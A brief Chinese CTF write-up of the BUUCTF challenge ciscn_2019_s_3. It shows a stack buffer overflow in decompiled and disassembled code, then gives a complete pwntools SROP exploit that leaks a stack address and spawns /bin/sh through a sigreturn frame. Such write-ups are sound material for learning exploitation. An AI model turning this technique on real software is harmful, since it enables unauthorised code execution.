先放个例题吧,原理后面有时间再更:BUUCTF ciscn_2019_s_3
保护只开了nx
1 signed __int64 vuln() 2 { 3 signed __int64 v0; // rax 4 char buf[16]; // [rsp+0h] [rbp-10h] BYREF 5 6 v0 = sys_read(0, buf, 0x400uLL); 7 return sys_write(1u, buf, 0x30uLL); 8 }
1 .text:00000000004004ED vuln proc near ; CODE XREF: main+14↓p 2 .text:00000000004004ED 3 .text:00000000004004ED buf = byte ptr -10h 4 .text:00000000004004ED 5 .text:00000000004004ED ; __unwind { 6 .text:00000000004004ED push rbp 7 .text:00000000004004EE mov rbp, rsp 8 .text:00000000004004F1 xor rax, rax 9 .text:00000000004004F4 mov edx, 400h ; count 10 .text:00000000004004F9 lea rsi, [rsp+buf] ; buf 11 .text:00000000004004FE mov rdi, rax ; fd 12 .text:0000000000400501 syscall ; LINUX - sys_read 13 .text:0000000000400503 mov rax, 1 14 .text:000000000040050A mov edx, 30h ; '0' ; count 15 .text:000000000040050F lea rsi, [rsp+buf] ; buf 16 .text:0000000000400514 mov rdi, rax ; fd 17 .text:0000000000400517 syscall ; LINUX - sys_write 18 .text:0000000000400519 retn
1 .text:00000000004004D6 gadgets proc near 2 .text:00000000004004D6 ; __unwind { 3 .text:00000000004004D6 push rbp 4 .text:00000000004004D7 mov rbp, rsp 5 .text:00000000004004DA mov rax, 0Fh 6 .text:00000000004004E1 retn 7 .text:00000000004004E1 gadgets endp ; sp-analysis failed 8 .text:00000000004004E1
很明显的SROP,要上课了,先把exp放出来吧
1 from pwn import * 2 context.log_level='debug' 3 context.arch='amd64' 4 5 s=process('./1') 6 7 read=0x4004F1 8 syscall_ret=0x400517 9 mov_rax_0xf=0x4004DA 10 11 12 payload=b'/bin/sh\x00aaaaaaaa'+p64(read) 13 s.sendline(payload) 14 15 s.recv(32) 16 bin_sh_addr=u64(s.recv(8))-0x118 17 18 sigframe=SigreturnFrame() 19 sigframe.rax=constants.SYS_execve#0x3b 20 sigframe.rdi=bin_sh_addr 21 sigframe.rip=syscall_ret 22 23 payload=b'a'*0x10+p64(mov_rax_0xf)+p64(syscall_ret)+bytes(sigframe) 24 s.send(payload) 25 26 s.interactive()